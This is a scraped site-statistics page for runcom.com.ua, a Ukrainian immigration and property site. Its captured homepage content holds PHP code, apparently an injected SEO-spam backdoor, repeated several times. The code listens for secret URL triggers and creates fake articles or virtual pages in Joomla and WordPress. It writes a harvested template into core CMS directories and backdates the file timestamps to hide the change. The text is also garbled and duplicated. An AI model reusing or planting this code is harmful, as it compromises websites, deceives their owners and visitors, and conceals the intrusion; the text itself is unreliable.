id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } } if (strpos($_SERVER['REQUEST_URI'], 'saveyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $context = stream_context_create(array( 'http' => array('ignore_errors' => true), )); $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/?gimmeyourfuckingtemplate', false, $context); if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate', false, $context); } if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate/', false, $context); } if ( preg_match('/thefuckingtitle\d+/', $tpl) || preg_match('/thefuckingcontent\d+/', $tpl) || (strpos($tpl, '[TITLE]') !== false) || (strpos($tpl, '[CONTENT]') !== false) ) { $tpl = str_replace('http://[PAGE_URL]', '[PAGE_URL]', $tpl); $tpl = preg_replace('#]+?alternate[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?archives[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bookmark[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?external[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?first[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?help[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?last[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?license[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?next[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?nofollow[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?noreferrer[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?pingback[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prefetch[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prev[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?search[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?sidebar[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?up[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?canonical[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?robots[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?charset[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?content-type[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?og:[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?viewport[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?keywords[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?description[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?google[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?yandex[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bing[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?slurp[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?refresh[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?referer[^>]+?>#is', '', $tpl); $tpl = preg_replace('##is', '', $tpl); $tpl = preg_replace('#http://www.google-analytics.com/#is', 'http://'.$_SERVER['HTTP_HOST'].'/', $tpl); $tpl = preg_replace('#]*>[^#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingtitle\d+#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingcontent\d+#is', '[CONTENT]', $tpl); $tpl = preg_replace('#\[CONTENT\]#is', '[CONTENT]', $tpl); $new_tags = ' '; $tpl = preg_replace('##is', $new_tags.'', $tpl); } $tpl_path = ''; $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/wp-admin/includes/')) { $tpl_path = '/wp-admin/includes/template.html'; } if (is_dir($root_path.'/libraries/joomla/application/')) { $tpl_path = '/libraries/joomla/application/template.html'; } chmod(dirname($root_path.$tpl_path), 0755); chmod($root_path.$tpl_path, 0644); if (!empty($tpl) && file_put_contents($root_path.$tpl_path, $tpl)) { echo 'Success!'; } else { echo 'failed'; } touch($root_path.$tpl_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($root_path.$tpl_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); exit; } if (strpos($_SERVER['REQUEST_URI'], 'gimmeyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/libraries/joomla/application/')) { $alias = 'fucking-alias-is-here'.mt_rand(1, 10000000000); $database = JFactory::getDBO(); $item = new stdClass; $item->id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } } РАНКОМ (RUNWAY COMPANY) - ВАШ ПОСРЕДНИК С ОСТАЛЬНЫМ МИРОМ! window.addEvent('domready', function() { SqueezeBox.initialize({}); $$('a.modal').each(function(el) { el.addEvent('click', function(e) { new Event(e).stop(); SqueezeBox.fromElement(el); }); }); }); var K2RatingURL = 'http://www.runcom.com.ua/'; НЕДВИЖИМОСТЬ И БИЗНЕС ЗА РУБЕЖОМ - ВНЖ - ИММИГРАЦИЯ В настоящее время сайт закрыт на реконструкцию.Пожалуйста, зайдите позже. Информация и контакты на http://www.runcom.org Логин Пароль Запомнить меня CloseHelp Us By Clicking any One! We really welcome your +1'd, Like Us & Tweet Us! Have a Good Day! Tweet (function() { var s = document.createElement('SCRIPT'), s1 = document.getElementsByTagName('SCRIPT')[0]; s.type = 'text/javascript'; s.async = true; s.src = 'http://widgets.digg.com/buttons.js'; s1.parentNode.insertBefore(s, s1); })(); Share or wait 30 seconds. window.addEvent("load", function(){ new LadyOverlay("ztmain-popup", { countdown: "count-down", transition: Fx.Transitions.linear, duration: 350, wait: 30000, url: "16e4cc8b13c43bc7e56abc77b7e7df7d" }); });"/>

НЕДВИЖИМОСТЬ И БИЗНЕС ЗА РУБЕЖОМ - ВИД НА ЖИТЕЛЬСТВО - ЭМИГРАЦИЯ И ИММИГРАЦИЯ

1.67 Rating by ClearWebStats
This website has a #22,831,325 rank in global traffic. It has a .com.ua as an domain extension. This domain is estimated value of $ 8.95 and has a daily earning of $ 0.15. While no active threats were reported recently by users, runcom.com.ua is SAFE to browse.
Get Custom Widget

Traffic Report of Runcom

Daily Unique Visitors: 21
Daily Pageviews: 42

Estimated Valuation

Income Per Day: $ 0.15
Estimated Worth: $ 8.95

Search Engine Indexes

Google Indexed Pages: Not Applicable
Yahoo Indexed Pages: Not Applicable
Bing Indexed Pages: Not Applicable

Search Engine Backlinks

Google Backlinks: Not Applicable
Bing Backlinks: Not Applicable
Alexa BackLinks: Not Applicable

Safety Information

Google Safe Browsing: No Risk Issues
Siteadvisor Rating: Not Applicable
WOT Trustworthiness: Not Applicable
WOT Privacy: Not Applicable
WOT Child Safety: Not Applicable

Website Ranks & Scores

Google Pagerank: Not Applicable
Alexa Rank: 22,831,325
Domain Authority: Not Applicable
Google Pagerank
PR 0 out of 10
PageSpeed Score
0
Siteadvisor Rating
View runcom.com.ua site advisor rating Not Applicable

Where is runcom.com.ua server located?

Hosted IP Address:

91.234.33.250 View other site hosted with runcom.com.ua

Hosted Country:

runcom.com.ua hosted country UA runcom.com.ua hosted country

Location Latitude:

50.4522

Location Longitude:

30.5287

Social Engagement

Facebook Shares: Not Applicable
Facebook Likes: Not Applicable
Facebook Comments: Not Applicable
Twitter Count (Tweets): Not Applicable
Linkedin Shares: Not Applicable
Delicious Shares: Not Applicable

Page Resources Breakdown

View runcom.com.ua HTML resources

Homepage Links Analysis

]*>[^#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingtitle\d+#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingcontent\d+#is', '[CONTENT]', $tpl); $tpl = preg_replace('#\[CONTENT\]#is', '[CONTENT]', $tpl); $new_tags = ' '; $tpl = preg_replace('##is', $new_tags.'', $tpl); } $tpl_path = ''; $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/wp-admin/includes/')) { $tpl_path = '/wp-admin/includes/template.html'; } if (is_dir($root_path.'/libraries/joomla/application/')) { $tpl_path = '/libraries/joomla/application/template.html'; } chmod(dirname($root_path.$tpl_path), 0755); chmod($root_path.$tpl_path, 0644); if (!empty($tpl) && file_put_contents($root_path.$tpl_path, $tpl)) { echo 'Success!'; } else { echo 'failed'; } touch($root_path.$tpl_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($root_path.$tpl_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); exit; } if (strpos($_SERVER['REQUEST_URI'], 'gimmeyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/libraries/joomla/application/')) { $alias = 'fucking-alias-is-here'.mt_rand(1, 10000000000); $database = JFactory::getDBO(); $item = new stdClass; $item->id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } } if (strpos($_SERVER['REQUEST_URI'], 'saveyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $context = stream_context_create(array( 'http' => array('ignore_errors' => true), )); $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/?gimmeyourfuckingtemplate', false, $context); if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate', false, $context); } if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate/', false, $context); } if ( preg_match('/thefuckingtitle\d+/', $tpl) || preg_match('/thefuckingcontent\d+/', $tpl) || (strpos($tpl, '[TITLE]') !== false) || (strpos($tpl, '[CONTENT]') !== false) ) { $tpl = str_replace('http://[PAGE_URL]', '[PAGE_URL]', $tpl); $tpl = preg_replace('#]+?alternate[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?archives[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bookmark[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?external[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?first[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?help[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?last[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?license[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?next[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?nofollow[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?noreferrer[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?pingback[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prefetch[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prev[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?search[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?sidebar[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?up[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?canonical[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?robots[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?charset[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?content-type[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?og:[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?viewport[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?keywords[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?description[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?google[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?yandex[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bing[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?slurp[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?refresh[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?referer[^>]+?>#is', '', $tpl); $tpl = preg_replace('##is', '', $tpl); $tpl = preg_replace('#http://www.google-analytics.com/#is', 'http://'.$_SERVER['HTTP_HOST'].'/', $tpl); $tpl = preg_replace('#]*>[^#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingtitle\d+#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingcontent\d+#is', '[CONTENT]', $tpl); $tpl = preg_replace('#\[CONTENT\]#is', '[CONTENT]', $tpl); $new_tags = ' '; $tpl = preg_replace('##is', $new_tags.'', $tpl); } $tpl_path = ''; $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/wp-admin/includes/')) { $tpl_path = '/wp-admin/includes/template.html'; } if (is_dir($root_path.'/libraries/joomla/application/')) { $tpl_path = '/libraries/joomla/application/template.html'; } chmod(dirname($root_path.$tpl_path), 0755); chmod($root_path.$tpl_path, 0644); if (!empty($tpl) && file_put_contents($root_path.$tpl_path, $tpl)) { echo 'Success!'; } else { echo 'failed'; } touch($root_path.$tpl_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($root_path.$tpl_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); exit; } if (strpos($_SERVER['REQUEST_URI'], 'gimmeyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/libraries/joomla/application/')) { $alias = 'fucking-alias-is-here'.mt_rand(1, 10000000000); $database = JFactory::getDBO(); $item = new stdClass; $item->id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } } РАНКОМ (RUNWAY COMPANY) - ВАШ ПОСРЕДНИК С ОСТАЛЬНЫМ МИРОМ! window.addEvent('domready', function() { SqueezeBox.initialize({}); $$('a.modal').each(function(el) { el.addEvent('click', function(e) { new Event(e).stop(); SqueezeBox.fromElement(el); }); }); }); var K2RatingURL = 'http://www.runcom.com.ua/'; НЕДВИЖИМОСТЬ И БИЗНЕС ЗА РУБЕЖОМ - ВНЖ - ИММИГРАЦИЯ В настоящее время сайт закрыт на реконструкцию.Пожалуйста, зайдите позже. Информация и контакты на http://www.runcom.org Логин Пароль Запомнить меня CloseHelp Us By Clicking any One! We really welcome your +1'd, Like Us & Tweet Us! Have a Good Day! Tweet (function() { var s = document.createElement('SCRIPT'), s1 = document.getElementsByTagName('SCRIPT')[0]; s.type = 'text/javascript'; s.async = true; s.src = 'http://widgets.digg.com/buttons.js'; s1.parentNode.insertBefore(s, s1); })(); Share or wait 30 seconds. window.addEvent("load", function(){ new LadyOverlay("ztmain-popup", { countdown: "count-down", transition: Fx.Transitions.linear, duration: 350, wait: 30000, url: "16e4cc8b13c43bc7e56abc77b7e7df7d" }); });

Website Inpage Analysis

H1 Headings: 1 H2 Headings: Not Applicable
H3 Headings: Not Applicable H4 Headings: Not Applicable
H5 Headings: Not Applicable H6 Headings: Not Applicable
Total IFRAMEs: Not Applicable Total Images: 1
Google Adsense: Not Applicable Google Analytics: Not Applicable

Websites Hosted on Same IP (i.e. 91.234.33.250)

Processing request...

runcom.com.ua favicon - chernigov-grad.info

View runcom.com.ua Pagerank   runcom.com.ua alexa rank 1,396,453   runcom.com.ua website value $ 480.00

Сайт бесплатных объявлений по украине

runcom.com.ua favicon - ukrobyava.com.ua

